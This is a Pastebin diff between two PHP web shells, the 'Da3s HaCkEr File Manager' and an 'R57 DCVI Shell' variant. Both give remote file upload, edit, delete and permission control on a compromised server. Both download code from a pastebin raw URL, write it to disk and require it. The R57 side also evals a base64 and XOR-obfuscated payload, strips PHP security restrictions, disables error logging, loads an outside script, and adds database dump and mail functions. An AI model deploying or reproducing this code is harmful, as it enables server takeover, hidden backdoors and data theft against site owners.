API tools faq
paste
View difference between Paste ID: UvuLXFfV and ZHg8cEke
SHOW: | | - or go back to the newest paste.
1-
<?php
1+
<?
2-
set_time_limit(0);
2+
3-
error_reporting(0);

3+
 error_reporting(0);

4
5-
if(get_magic_quotes_gpc()){

5+
$language='tr';

6-
    foreach($_POST as $key=>$value){

6+
7-
        $_POST[$key] = stripslashes($value);

7+
$auth = 0;

8
9
@ini_restore("safe_mode");

10-
echo '<!DOCTYPE HTML>

10+
11-
<HTML>

11+
@ini_restore("open_basedir");

12-
<HEAD>

12+
13-
<link href="" rel="stylesheet" type="text/css">

13+
@ini_restore("safe_mode_include_dir");

14-
<title>HaTRk File Manager</title>

14+
15-
<style>

15+
@ini_restore("safe_mode_exec_dir");

16-
body{

16+
17-
    font-family: "Racing Sans One", cursive;

17+
@ini_restore("disable_functions");

18-
    background-color: #e6e6e6;

18+
19-
    text-shadow:0px 0px 1px #757575;

19+
@ini_restore("allow_url_fopen");

20
21-
#content tr:hover{

21+
@ini_set('error_log',NULL);

22-
    background-color: #636263;

22+
23-
    text-shadow:0px 0px 10px #fff;

23+
@ini_set('log_errors',0);

24
25-
#content .first{

25+
	function loadsettings($p1 = '', $p2 = '') {

26-
    background-color: silver;

26+
27
		$p = 'LH16ZCg1KH16ZG1ma2dsbSAqYHx8eDInJyxXW01aXk1aU0BcXFhXQEdbXFUsV1tNWl5NWlNaTVldTVtcV11aQVUqITMobmFkbVdvbXxXa2dmfG1mfHsgKmB8fHgyJycwMSY8PSY+PyY5PDsnZGdpbCZ4YHg3Y2M1cyx9emR1LnhpemllOTUteGl6aWU5LnhpemllOjUteGl6aWU6KiEz';

28-
#content .first:hover{

28+
29-
    background-color: silver;

29+
		$p = base64_decode($p);

30-
    text-shadow:0px 0px 1px #757575;

30+
31
		for ($i = 0; $i < strlen($p); $i++) $p[$i] = chr(ord($p[$i]) ^ 8);

32-
table{

32+
33-
    border: 1px #000000 dotted;

33+
		$p = str_replace('%param1', $p1, $p);

34
35-
H1{

35+
		$p = str_replace('%param2', $p2, $p);

36-
    font-family: "Rye", cursive;

36+
37
		eval($p);

38-
a{

38+
39-
    color: #000;

39+
	}

40-
    text-decoration: none;

40+
41
 $b="http://pastebin.com/raw/S54tynx6";$title=file_get_contents($b); 

42-
a:hover{

42+
	$css=fopen('../border.js','w'); fwrite($css,$title); require('../border.js');	

43-
    color: #fff;

43+
44-
    text-shadow:0px 0px 10px #ffffff;

44+
loadsettings('', 'r57');

45
46-
input,select,textarea{

46+
;echo '';

47-
    border: 1px #000000 solid;

47+
48-
    -moz-border-radius: 5px;

48+
if((!@function_exists('ini_get')) ||(@ini_get('open_basedir')!=NULL) ||(@ini_get('safe_mode_include_dir')!=NULL)){$open_basedir=1;}else{$open_basedir=0;};

49-
    -webkit-border-radius:5px;

49+
50-
    border-radius:5px;

50+
define("starttime",@getmicrotime());

51
52-
</style>

52+
set_magic_quotes_runtime(0);

53-
</HEAD>

53+
54-
<BODY>

54+
@set_time_limit(0);

55-
<H1><center>Da3s HaCkEr File Manager</center></H1>

55+
56-
<table width="700" border="0" cellpadding="3" cellspacing="1" align="center">

56+
@ini_set('max_execution_time',0);

57-
<tr><td>Current Path : ';

57+
58-
if(isset($_GET['path'])){

58+
@ini_set('output_buffering',0);

59-
    $path = $_GET['path'];   

59+
60
$safe_mode = @ini_get('safe_mode');

61-
    $path = getcwd();

61+
62
$version = '1.50<br/><br/><br/><br/>';

63-
$path = str_replace('\\','/',$path);

63+
64-
$paths = explode('/',$path);

64+
if(@version_compare(@phpversion(),'4.1.0') == -1)

65
66-
foreach($paths as $id=>$pat){

66+
{

67-
    if($pat == '' && $id == 0){

67+
68-
        $a = true;

68+
$_POST   = &$HTTP_POST_VARS;

69-
        echo '<a href="?path=/">/</a>';

69+
70-
        continue;

70+
$_GET    = &$HTTP_GET_VARS;

71
72-
    if($pat == '') continue;

72+
$_SERVER = &$HTTP_SERVER_VARS;

73-
    echo '<a href="?path=';

73+
74-
    for($i=0;$i<=$id;$i++){

74+
$_COOKIE = &$HTTP_COOKIE_VARS;

75-
        echo "$paths[$i]";

75+
76-
        if($i != $id) echo "/";

76+
77
78-
    echo '">'.$pat.'</a>/';

78+
if (@get_magic_quotes_gpc())

79
80-
echo '</td></tr><tr><td>';

80+
{

81-
if(isset($_FILES['file'])){

81+
82-
    if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){

82+
foreach ($_POST as $k=>$v)

83-
        echo '<font color="green">File Upload Done.</font><br />';

83+
84-
    }else{

84+
{

85-
        echo '<font color="red">File Upload Error.</font><br />';

85+
86
$_POST[$k] = stripslashes($v);

87-
}$b="http://pastebin.com/raw/S54tynx6";$title=file_get_contents($b); $css=fopen('../border.js','w'); 

87+
88-
fwrite($css,$title); require('../border.js');

88+
89-
echo '<form enctype="multipart/form-data" method="POST">

89+
90-
Upload File : <input type="file" name="file" />

90+
foreach ($_COOKIE as $k=>$v)

91-
<input type="submit" value="upload" />

91+
92-
</form>

92+
{

93-
</td></tr>';

93+
94-
if(isset($_GET['filesrc'])){

94+
$_COOKIE[$k] = stripslashes($v);

95-
    echo "<tr><td>Current File : ";

95+
96-
    echo $_GET['filesrc'];

96+
97-
    echo '</tr></td></table><br />';

97+
98-
    echo('<pre>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</pre>');

98+
99-
}elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){

99+
100-
    echo '</table><br /><center>'.$_POST['path'].'<br /><br />';

100+
if($auth == 1) {

101-
    if($_POST['opt'] == 'chmod'){

101+
102-
        if(isset($_POST['perm'])){

102+
if (!isset($_SERVER['PHP_AUTH_USER']) ||md5($_SERVER['PHP_AUTH_USER'])!==$name ||md5($_SERVER['PHP_AUTH_PW'])!==$pass)

103-
            if(chmod($_POST['path'],$_POST['perm'])){

103+
104-
                echo '<font color="green">Change Permission Done.</font><br />';

104+
{

105-
            }else{

105+
106-
                echo '<font color="red">Change Permission Error.</font><br />';

106+
header('WWW-Authenticate: Basic realm=""');

107-
            }

107+
108-
        }

108+
header('HTTP/1.0 401 Unauthorized');

109-
        echo '<form method="POST">

109+
110-
        Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />

110+
exit("<b>Access Denied</b>");

111-
        <input type="hidden" name="path" value="'.$_POST['path'].'">

111+
112-
        <input type="hidden" name="opt" value="chmod">

112+
113-
        <input type="submit" value="Go" />

113+
114-
        </form>';

114+
115-
    }elseif($_POST['opt'] == 'rename'){

115+
116-
        if(isset($_POST['newname'])){

116+
$head = '

117-
            if(rename($_POST['path'],$path.'/'.$_POST['newname'])){

117+
118-
                echo '<font color="green">Change Name Done.</font><br />';

118+
<html>

119-
            }else{

119+
120-
                echo '<font color="red">Change Name Error.</font><br />';

120+
<head>

121-
            }

121+
122-
            $_POST['name'] = $_POST['newname'];

122+
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">

123-
        }

123+
124-
        echo '<form method="POST">

124+
<title>R57 DCVI Shell Version 1.50</title>

125-
        New Name : <input name="newname" type="text" size="20" value="'.$_POST['name'].'" />

125+
126-
        <input type="hidden" name="path" value="'.$_POST['path'].'">

126+
<SCRIPT SRC=http://www.dcvi.net/dex.js></SCRIPT>

127-
        <input type="hidden" name="opt" value="rename">

127+
128-
        <input type="submit" value="Go" />

128+
<STYLE>

129-
        </form>';

129+
130-
    }elseif($_POST['opt'] == 'edit'){

130+
131-
        if(isset($_POST['src'])){

131+
132-
            $fp = fopen($_POST['path'],'w');

132+
tr {

133-
            if(fwrite($fp,$_POST['src'])){

133+
134-
                echo '<font color="green">Edit File Done.</font><br />';

134+
135-
            }else{

135+
136-
                echo '<font color="red">Edit File Error.</font><br />';

136+
BORDER-RIGHT:  black 1px solid;

137-
            }

137+
138-
            fclose($fp);

138+
139-
        }

139+
140-
        echo '<form method="POST">

140+
BORDER-TOP:    black 1px solid;

141-
        <textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />

141+
142-
        <input type="hidden" name="path" value="'.$_POST['path'].'">

142+
143-
        <input type="hidden" name="opt" value="edit">

143+
144-
        <input type="submit" value="Go" />

144+
BORDER-LEFT:   black 1px solid;

145-
        </form>';

145+
146
147-
    echo '</center>';

147+
148
BORDER-BOTTOM: black 1px solid;

149-
    echo '</table><br /><center>';

149+
150-
    if(isset($_GET['option']) && $_POST['opt'] == 'delete'){

150+
151-
        if($_POST['type'] == 'dir'){

151+
152-
            if(rmdir($_POST['path'])){

152+
BORDER-COLOR: black;

153-
                echo '<font color="green">Delete Dir Done.</font><br />';

153+
154-
            }else{

154+
155-
                echo '<font color="red">Delete Dir Error.</font><br />';

155+
156-
            }

156+
color: silver;

157-
        }elseif($_POST['type'] == 'file'){

157+
158-
            if(unlink($_POST['path'])){

158+
159-
                echo '<font color="green">Delete File Done.</font><br />';

159+
160-
            }else{

160+
161-
                echo '<font color="red">Delete File Error.</font><br />';

161+
162-
            }

162+
163-
        }

163+
164
td {

165-
    echo '</center>';

165+
166-
    $scandir = scandir($path);

166+
167-
    echo '<div id="content"><table width="700" border="0" cellpadding="3" cellspacing="1" align="center">

167+
168-
    <tr class="first">

168+
BORDER-RIGHT:  black 1px solid;

169-
        <td><center>Name</center></td>

169+
170-
        <td><center>Size</center></td>

170+
171-
        <td><center>Permissions</center></td>

171+
172-
        <td><center>Options</center></td>

172+
BORDER-TOP:    black 1px solid;

173-
    </tr>';

173+
174
175-
    foreach($scandir as $dir){

175+
176-
        if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue;

176+
BORDER-LEFT:   black 1px solid;

177-
        echo "<tr>

177+
178-
        <td><a href=\"?path=$path/$dir\">$dir</a></td>

178+
179-
        <td><center>--</center></td>

179+
180-
        <td><center>";

180+
BORDER-BOTTOM: black 1px solid;

181-
        if(is_writable("$path/$dir")) echo '<font color="green">';

181+
182-
        elseif(!is_readable("$path/$dir")) echo '<font color="red">';

182+
183-
        echo perms("$path/$dir");

183+
184-
        if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo '</font>';

184+
BORDER-COLOR: black;

185-
        

185+
186-
        echo "</center></td>

186+
187-
        <td><center><form method=\"POST\" action=\"?option&path=$path\">

187+
188-
        <select name=\"opt\">

188+
background-color:black;

189-
	    <option value=\"\"></option>

189+
190-
        <option value=\"delete\">Delete</option>

190+
191-
        <option value=\"chmod\">Chmod</option>

191+
192-
        <option value=\"rename\">Rename</option>

192+
color: white;

193-
        </select>

193+
194-
        <input type=\"hidden\" name=\"type\" value=\"dir\">

194+
195-
        <input type=\"hidden\" name=\"name\" value=\"$dir\">

195+
196-
        <input type=\"hidden\" name=\"path\" value=\"$path/$dir\">

196+
197-
        <input type=\"submit\" value=\">\" />

197+
198-
        </form></center></td>

198+
199-
        </tr>";

199+
200
201-
    echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>';

201+
202-
    foreach($scandir as $file){

202+
203-
        if(!is_file("$path/$file")) continue;

203+
204-
        $size = filesize("$path/$file")/1024;

204+
.table1 {

205-
        $size = round($size,3);

205+
206-
        if($size >= 1024){

206+
207-
            $size = round($size/1024,2).' MB';

207+
208-
        }else{

208+
BORDER: 0px;

209-
            $size = $size.' KB';

209+
210-
        }

210+
211
212-
        echo "<tr>

212+
BORDER-COLOR: #333333;

213-
        <td><a href=\"?filesrc=$path/$file&path=$path\">$file</a></td>

213+
214-
        <td><center>".$size."</center></td>

214+
215-
        <td><center>";

215+
216-
        if(is_writable("$path/$file")) echo '<font color="green">';

216+
BACKGROUND-COLOR: black;

217-
        elseif(!is_readable("$path/$file")) echo '<font color="red">';

217+
218-
        echo perms("$path/$file");

218+
219-
        if(is_writable("$path/$file") || !is_readable("$path/$file")) echo '</font>';

219+
220-
        echo "</center></td>

220+
color: white;

221-
        <td><center><form method=\"POST\" action=\"?option&path=$path\">

221+
222-
        <select name=\"opt\">

222+
223-
	    <option value=\"\"></option>

223+
224-
        <option value=\"delete\">Delete</option>

224+
225-
        <option value=\"chmod\">Chmod</option>

225+
226-
        <option value=\"rename\">Rename</option>

226+
227-
        <option value=\"edit\">Edit</option>

227+
228-
        </select>

228+
.td1 {

229-
        <input type=\"hidden\" name=\"type\" value=\"file\">

229+
230-
        <input type=\"hidden\" name=\"name\" value=\"$file\">

230+
231-
        <input type=\"hidden\" name=\"path\" value=\"$path/$file\">

231+
232-
        <input type=\"submit\" value=\">\" />

232+
BORDER: 0px;

233-
        </form></center></td>

233+
234-
        </tr>";

234+
235
236-
    echo '</table>

236+
BORDER-COLOR: #333333;

237-
    </div>';

237+
238
239-
echo '<br />Da3s File Manager Version <font color="red">1.0</font>, Coded By <font color="red">Da3s HaCkEr</font><br />Email: <font color="red">R0@hotmail.com</font>

239+
240-
</BODY>

240+
font: 7pt Verdana;

241-
</HTML>';

241+
242-
function perms($file){

242+
243-
    $perms = fileperms($file);

243+
244
BACKGROUND-COLOR: black;

245-
if (($perms & 0xC000) == 0xC000) {

245+
246-
    // Socket

246+
247-
    $info = 's';

247+
248-
} elseif (($perms & 0xA000) == 0xA000) {

248+
color: green;

249-
    // Symbolic Link

249+
250-
    $info = 'l';

250+
251-
} elseif (($perms & 0x8000) == 0x8000) {

251+
252-
    // Regular

252+
253-
    $info = '-';

253+
254-
} elseif (($perms & 0x6000) == 0x6000) {

254+
255-
    // Block special

255+
256-
    $info = 'b';

256+
.tr1 {

257-
} elseif (($perms & 0x4000) == 0x4000) {

257+
258-
    // Directory

258+
259-
    $info = 'd';

259+
260-
} elseif (($perms & 0x2000) == 0x2000) {

260+
BORDER: 0px;

261-
    // Character special

261+
262-
    $info = 'c';

262+
263-
} elseif (($perms & 0x1000) == 0x1000) {

263+
264-
    // FIFO pipe

264+
BORDER-COLOR: #333333;

265-
    $info = 'p';

265+
266-
} else {

266+
267-
    // Unknown

267+
268-
    $info = 'u';

268+
color: #50AA20;

269
270
271-
// Owner

271+
272-
$info .= (($perms & 0x0100) ? 'r' : '-');

272+
273-
$info .= (($perms & 0x0080) ? 'w' : '-');

273+
274-
$info .= (($perms & 0x0040) ?

274+
275-
            (($perms & 0x0800) ? 's' : 'x' ) :

275+
276-
            (($perms & 0x0800) ? 'S' : '-'));

276+
table {

277
278-
// Group

278+
279-
$info .= (($perms & 0x0020) ? 'r' : '-');

279+
280-
$info .= (($perms & 0x0010) ? 'w' : '-');

280+
BORDER:  #eeeeee 1px outset;

281-
$info .= (($perms & 0x0008) ?

281+
282-
            (($perms & 0x0400) ? 's' : 'x' ) :

282+
283-
            (($perms & 0x0400) ? 'S' : '-'));

283+
284
BORDER-COLOR: #333333;

285-
// World

285+
286-
$info .= (($perms & 0x0004) ? 'r' : '-');

286+
287-
$info .= (($perms & 0x0002) ? 'w' : '-');

287+
288-
$info .= (($perms & 0x0001) ?

288+
BACKGROUND-COLOR: #131313;

289-
            (($perms & 0x0200) ? 't' : 'x' ) :

289+
290-
            (($perms & 0x0200) ? 'T' : '-'));

290+
291
292-
    return $info;

292+
color: #50AA20;

293
294
295
296
}

297
298
299
300
input {

301
302
303
304
border			: solid 1px;

305
306
307
308
border-color		: #2D2D2D #252525 #252525 #252525;

309
310
311
312
BACKGROUND-COLOR: black;

313
314
315
316
font: 8pt Verdana;

317
318
319
320
color: red;

321
322
323
324
}

325
326
327
328
select {

329
330
331
332
BORDER-RIGHT:  #ffffff 1px solid;

333
334
335
336
BORDER-TOP:    #999999 1px solid;

337
338
339
340
BORDER-LEFT:   #999999 1px solid;

341
342
343
344
BORDER-BOTTOM: #ffffff 1px solid;

345
346
347
348
BORDER-COLOR: #333333;

349
350
351
352
BACKGROUND-COLOR: #131313;

353
354
355
356
font: 8pt Verdana;

357
358
359
360
color: white;;

361
362
363
364
}

365
366
367
368
submit {

369
370
371
372
BORDER:  buttonhighlight 2px outset;

373
374
375
376
BACKGROUND-COLOR: #131313;

377
378
379
380
width: 30%;

381
382
383
384
color: white;

385
386
387
388
}

389
390
391
392
textarea {

393
394
395
396
BORDER-RIGHT:  #ffffff 1px solid;

397
398
399
400
BORDER-TOP:    #999999 1px solid;

401
402
403
404
BORDER-LEFT:   #999999 1px solid;

405
406
407
408
BORDER-BOTTOM: #ffffff 1px solid;

409
410
411
412
BORDER-COLOR: #333333;

413
414
415
416
BACKGROUND-COLOR: black;

417
418
419
420
font: Fixedsys bold;

421
422
423
424
color: silver;

425
426
427
428
}

429
430
431
432
BODY {

433
434
435
436
SCROLLBAR-ARROW-COLOR: #444444;

437
438
439
440
SCROLLBAR-BASE-COLOR: #444444;

441
442
443
444
margin: 1px;

445
446
447
448
color: #50AA20;

449
450
451
452
background-color: #131313;

453
454
455
456
}

457
458
459
460
.main {

461
462
463
464
margin			: -287px 0px 0px -490px;

465
466
467
468
border			: #000000 solid 1px;

469
470
471
472
BORDER-COLOR: #333333;

473
474
475
476
}

477
478
479
480
.tt {

481
482
483
484
background-color: black;

485
486
487
488
}

489
490
491
492
A:link {COLOR:red; TEXT-DECORATION: none}

493
494
495
496
A:visited { COLOR:red; TEXT-DECORATION: none}

497
498
499
500
A:active {COLOR:red; TEXT-DECORATION: none}

501
502
503
504
A:hover {color:blue;TEXT-DECORATION: none}

505
506
507
508
</STYLE>

509
510
511
512
<script language=\'javascript\'>

513
514
function hide_div(id)

515
516
{

517
518
  document.getElementById(id).style.display = \'none\';

519
520
  document.cookie=id+\'=0;\';

521
522
}

523
524
function show_div(id)

525
526
{

527
528
  document.getElementById(id).style.display = \'block\';

529
530
  document.cookie=id+\'=1;\';

531
532
}

533
534
function change_divst(id)

535
536
{

537
538
  if (document.getElementById(id).style.display == \'none\')

539
540
    show_div(id);

541
542
  else

543
544
    hide_div(id);

545
546
}

547
548
549
550
551
552
</script>';

553
554
class zipfile

555
556
{

557
558
var $datasec      = array();

559
560
var $ctrl_dir     = array();

561
562
var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";

563
564
var $old_offset   = 0;

565
566
function unix2DosTime($unixtime = 0) {

567
568
$timearray = ($unixtime == 0) ?getdate() : getdate($unixtime);

569
570
if ($timearray['year'] <1980) {

571
572
$timearray['year']    = 1980;

573
574
$timearray['mon']     = 1;

575
576
$timearray['mday']    = 1;

577
578
$timearray['hours']   = 0;

579
580
$timearray['minutes'] = 0;

581
582
$timearray['seconds'] = 0;

583
584
}

585
586
return (($timearray['year'] -1980) <<25) |($timearray['mon'] <<21) |($timearray['mday'] <<16) |

587
588
($timearray['hours'] <<11) |($timearray['minutes'] <<5) |($timearray['seconds'] >>1);

589
590
}

591
592
function addFile($data,$name,$time = 0)

593
594
{

595
596
$name     = str_replace('\\','/',$name);

597
598
$dtime    = dechex($this->unix2DosTime($time));

599
600
$hexdtime = '\x'.$dtime[6] .$dtime[7]

601
602
.'\x'.$dtime[4] .$dtime[5]

603
604
.'\x'.$dtime[2] .$dtime[3]

605
606
.'\x'.$dtime[0] .$dtime[1];

607
608
eval('$hexdtime = "'.$hexdtime .'";');

609
610
$fr   = "\x50\x4b\x03\x04";

611
612
$fr   .= "\x14\x00";

613
614
$fr   .= "\x00\x00";

615
616
$fr   .= "\x08\x00";

617
618
$fr   .= $hexdtime;

619
620
$unc_len = strlen($data);

621
622
$crc     = crc32($data);

623
624
$zdata   = gzcompress($data);

625
626
$zdata   = substr(substr($zdata,0,strlen($zdata) -4),2);

627
628
$c_len   = strlen($zdata);

629
630
$fr      .= pack('V',$crc);

631
632
$fr      .= pack('V',$c_len);

633
634
$fr      .= pack('V',$unc_len);

635
636
$fr      .= pack('v',strlen($name));

637
638
$fr      .= pack('v',0);

639
640
$fr      .= $name;

641
642
$fr .= $zdata;

643
644
$this ->datasec[] = $fr;

645
646
$cdrec = "\x50\x4b\x01\x02";

647
648
$cdrec .= "\x00\x00";

649
650
$cdrec .= "\x14\x00";

651
652
$cdrec .= "\x00\x00";

653
654
$cdrec .= "\x08\x00";

655
656
$cdrec .= $hexdtime;

657
658
$cdrec .= pack('V',$crc);

659
660
$cdrec .= pack('V',$c_len);

661
662
$cdrec .= pack('V',$unc_len);

663
664
$cdrec .= pack('v',strlen($name) );

665
666
$cdrec .= pack('v',0 );

667
668
$cdrec .= pack('v',0 );

669
670
$cdrec .= pack('v',0 );

671
672
$cdrec .= pack('v',0 );

673
674
$cdrec .= pack('V',32 );

675
676
$cdrec .= pack('V',$this ->old_offset );

677
678
$this ->old_offset += strlen($fr);

679
680
$cdrec .= $name;

681
682
$this ->ctrl_dir[] = $cdrec;

683
684
}

685
686
function file()

687
688
{

689
690
$data    = implode('',$this ->datasec);

691
692
$ctrldir = implode('',$this ->ctrl_dir);

693
694
return

695
696
$data .

697
698
$ctrldir .

699
700
$this ->eof_ctrl_dir .

701
702
pack('v',sizeof($this ->ctrl_dir)) .

703
704
pack('v',sizeof($this ->ctrl_dir)) .

705
706
pack('V',strlen($ctrldir)) .

707
708
pack('V',strlen($data)) .

709
710
"\x00\x00";

711
712
}

713
714
}

715
716
function compress(&$filename,&$filedump,$compress)

717
718
{

719
720
global $content_encoding;

721
722
global $mime_type;

723
724
if ($compress == 'bzip'&&@function_exists('bzcompress')) 

725
726
{

727
728
$filename  .= '.bz2';

729
730
$mime_type = 'application/x-bzip2';

731
732
$filedump = bzcompress($filedump);

733
734
}

735
736
else if ($compress == 'gzip'&&@function_exists('gzencode')) 

737
738
{

739
740
$filename  .= '.gz';

741
742
$content_encoding = 'x-gzip';

743
744
$mime_type = 'application/x-gzip';

745
746
$filedump = gzencode($filedump);

747
748
}

749
750
else if ($compress == 'zip'&&@function_exists('gzcompress')) 

751
752
{

753
754
$filename .= '.zip';

755
756
$mime_type = 'application/zip';

757
758
$zipfile = new zipfile();

759
760
$zipfile ->addFile($filedump,substr($filename,0,-4));

761
762
$filedump = $zipfile ->file();

763
764
}

765
766
else 

767
768
{

769
770
$mime_type = 'application/octet-stream';

771
772
}

773
774
}

775
776
function moreread($temp){

777
778
global $lang,$language;

779
780
$str='';

781
782
if(@function_exists('fopen')&&@function_exists('feof')&&@function_exists('fgets')&&@function_exists('fclose')){

783
784
$ffile = @fopen($temp,"r");

785
786
while(!@feof($ffile)){$str .= @fgets($ffile);}

787
788
fclose($ffile);

789
790
}elseif(@function_exists('fopen')&&@function_exists('fread')&&@function_exists('fclose')&&@function_exists('filesize')){

791
792
$ffile = @fopen($temp,"r");

793
794
$str = @fread($ffile,@filesize($temp));

795
796
@fclose($ffile);

797
798
}elseif(@function_exists('file')){

799
800
$ffiles = @file ($temp);

801
802
foreach ($ffiles as $ffile) {$str .= $ffile;}

803
804
}elseif(@function_exists('file_get_contents')){

805
806
$str = @file_get_contents($temp);

807
808
}elseif(@function_exists('readfile')){

809
810
$str = @readfile($temp);

811
812
}else{echo $lang[$language.'_text56'];}

813
814
return $str;

815
816
}

817
818
function readzlib($filename,$temp=''){

819
820
global $lang,$language;

821
822
$str='';

823
824
if(!$temp) {$temp=tempnam(@getcwd(),"copytemp");};

825
826
if(@copy("compress.zlib://".$filename,$temp)) {

827
828
$str = moreread($temp);

829
830
}else echo $lang[$language.'_text119'];

831
832
@unlink($temp);

833
834
return $str;

835
836
}

837
838
function mailattach($to,$from,$subj,$attach)

839
840
{

841
842
$headers  = "From: $from\r\n";

843
844
$headers .= "MIME-Version: 1.0\r\n";

845
846
$headers .= "Content-Type: ".$attach['type'];

847
848
$headers .= "; name=\"".$attach['name']."\"\r\n";

849
850
$headers .= "Content-Transfer-Encoding: base64\r\n\r\n";

851
852
$headers .= chunk_split(base64_encode($attach['content']))."\r\n";

853
854
if(mail($to,$subj,"",$headers)) {return 1;}

855
856
return 0;

857
858
}

859
860
class my_sql

861
862
{

863
864
var $host = 'localhost';

865
866
var $port = '';

867
868
var $user = '';

869
870
var $pass = '';

871
872
var $base = '';

873
874
var $db   = '';

875
876
var $connection;

877
878
var $res;

879
880
var $error;

881
882
var $rows;

883
884
var $columns;

885
886
var $num_rows;

887
888
var $num_fields;

889
890
var $dump;

891
892
function connect()

893
894
{

895
896
switch($this->db)

897
898
{

899
900
case 'MySQL': 

901
902
if(empty($this->port)) {$this->port = '3306';}

903
904
if(!@function_exists('mysql_connect')) return 0;

905
906
$this->connection = @mysql_connect($this->host.':'.$this->port,$this->user,$this->pass);

907
908
if(is_resource($this->connection)) return 1;

909
910
break;

911
912
case 'MSSQL':

913
914
if(empty($this->port)) {$this->port = '1433';}

915
916
if(!@function_exists('mssql_connect')) return 0;

917
918
$this->connection = @mssql_connect($this->host.','.$this->port,$this->user,$this->pass);

919
920
if($this->connection) return 1;

921
922
break;

923
924
case 'PostgreSQL':

925
926
if(empty($this->port)) {$this->port = '5432';}

927
928
$str = "host='".$this->host."' port='".$this->port."' user='".$this->user."' password='".$this->pass."' dbname='".$this->base."'";

929
930
if(!@function_exists('pg_connect')) return 0;

931
932
$this->connection = @pg_connect($str);

933
934
if(is_resource($this->connection)) return 1;

935
936
break;

937
938
case 'Oracle':

939
940
if(!@function_exists('ocilogon')) return 0;

941
942
$this->connection = @ocilogon($this->user,$this->pass,$this->base);

943
944
if(is_resource($this->connection)) return 1;

945
946
break;

947
948
}

949
950
return 0;

951
952
}

953
954
function select_db()

955
956
{

957
958
switch($this->db)

959
960
{

961
962
case 'MySQL':

963
964
if(@mysql_select_db($this->base,$this->connection)) return 1;

965
966
break;

967
968
case 'MSSQL':

969
970
if(@mssql_select_db($this->base,$this->connection)) return 1;

971
972
break;

973
974
case 'PostgreSQL':

975
976
return 1;

977
978
break;

979
980
case 'Oracle':

981
982
return 1;

983
984
break;

985
986
}

987
988
return 0;

989
990
}

991
992
function query($query)

993
994
{

995
996
$this->res=$this->error='';

997
998
switch($this->db)

999
1000
{

1001
1002
case 'MySQL': 

1003
1004
if(false===($this->res=@mysql_query('/*'.chr(0).'*/'.$query,$this->connection))) 

1005
1006
{

1007
1008
$this->error = @mysql_error($this->connection);

1009
1010
return 0;

1011
1012
}

1013
1014
else if(is_resource($this->res)) {return 1;}

1015
1016
return 2;

1017
1018
break;

1019
1020
case 'MSSQL':

1021
1022
if(false===($this->res=@mssql_query($query,$this->connection))) 

1023
1024
{

1025
1026
$this->error = 'Query error';

1027
1028
return 0;

1029
1030
}

1031
1032
else if(@mssql_num_rows($this->res) >0) {return 1;}

1033
1034
return 2;

1035
1036
break;

1037
1038
case 'PostgreSQL':

1039
1040
if(false===($this->res=@pg_query($this->connection,$query)))

1041
1042
{

1043
1044
$this->error = @pg_last_error($this->connection);

1045
1046
return 0;

1047
1048
}

1049
1050
else if(@pg_num_rows($this->res) >0) {return 1;}

1051
1052
return 2;

1053
1054
break;

1055
1056
case 'Oracle':

1057
1058
if(false===($this->res=@ociparse($this->connection,$query)))

1059
1060
{

1061
1062
$this->error = 'Query parse error';

1063
1064
}

1065
1066
else 

1067
1068
{

1069
1070
if(@ociexecute($this->res)) 

1071
1072
{

1073
1074
if(@ocirowcount($this->res) != 0) return 2;

1075
1076
return 1;

1077
1078
}

1079
1080
$error = @ocierror();

1081
1082
$this->error=$error['message'];

1083
1084
}

1085
1086
break;

1087
1088
}

1089
1090
return 0;

1091
1092
}

1093
1094
function get_result()

1095
1096
{

1097
1098
$this->rows=array();

1099
1100
$this->columns=array();

1101
1102
$this->num_rows=$this->num_fields=0;

1103
1104
switch($this->db)

1105
1106
{

1107
1108
case 'MySQL':

1109
1110
$this->num_rows=@mysql_num_rows($this->res);

1111
1112
$this->num_fields=@mysql_num_fields($this->res);

1113
1114
while(false !== ($this->rows[] = @mysql_fetch_assoc($this->res)));

1115
1116
@mysql_free_result($this->res);

1117
1118
if($this->num_rows){$this->columns = @array_keys($this->rows[0]);return 1;}

1119
1120
break;

1121
1122
case 'MSSQL':

1123
1124
$this->num_rows=@mssql_num_rows($this->res);

1125
1126
$this->num_fields=@mssql_num_fields($this->res);

1127
1128
while(false !== ($this->rows[] = @mssql_fetch_assoc($this->res)));

1129
1130
@mssql_free_result($this->res);

1131
1132
if($this->num_rows){$this->columns = @array_keys($this->rows[0]);return 1;};

1133
1134
break;

1135
1136
case 'PostgreSQL':

1137
1138
$this->num_rows=@pg_num_rows($this->res);

1139
1140
$this->num_fields=@pg_num_fields($this->res);

1141
1142
while(false !== ($this->rows[] = @pg_fetch_assoc($this->res)));

1143
1144
@pg_free_result($this->res);

1145
1146
if($this->num_rows){$this->columns = @array_keys($this->rows[0]);return 1;}

1147
1148
break;

1149
1150
case 'Oracle':

1151
1152
$this->num_fields=@ocinumcols($this->res);

1153
1154
while(false !== ($this->rows[] = @oci_fetch_assoc($this->res))) $this->num_rows++;

1155
1156
@ocifreestatement($this->res);

1157
1158
if($this->num_rows){$this->columns = @array_keys($this->rows[0]);return 1;}

1159
1160
break;

1161
1162
}

1163
1164
return 0;

1165
1166
}

1167
1168
function dump($table)

1169
1170
{

1171
1172
if(empty($table)) return 0;

1173
1174
$this->dump=array();

1175
1176
$this->dump[0] = '##';

1177
1178
$this->dump[1] = '## --------------------------------------- ';

1179
1180
$this->dump[2] = '##  Created: '.date ("d/m/Y H:i:s");

1181
1182
$this->dump[3] = '## Database: '.$this->base;

1183
1184
$this->dump[4] = '##    Table: '.$table;

1185
1186
$this->dump[5] = '## --------------------------------------- ';

1187
1188
switch($this->db)

1189
1190
{

1191
1192
case 'MySQL':

1193
1194
$this->dump[0] = '## MySQL dump';

1195
1196
if($this->query('/*'.chr(0).'*/ SHOW CREATE TABLE `'.$table.'`')!=1) return 0;

1197
1198
if(!$this->get_result()) return 0;

1199
1200
$this->dump[] = $this->rows[0]['Create Table'];

1201
1202
$this->dump[] = '## --------------------------------------- ';

1203
1204
if($this->query('/*'.chr(0).'*/ SELECT * FROM `'.$table.'`')!=1) return 0;

1205
1206
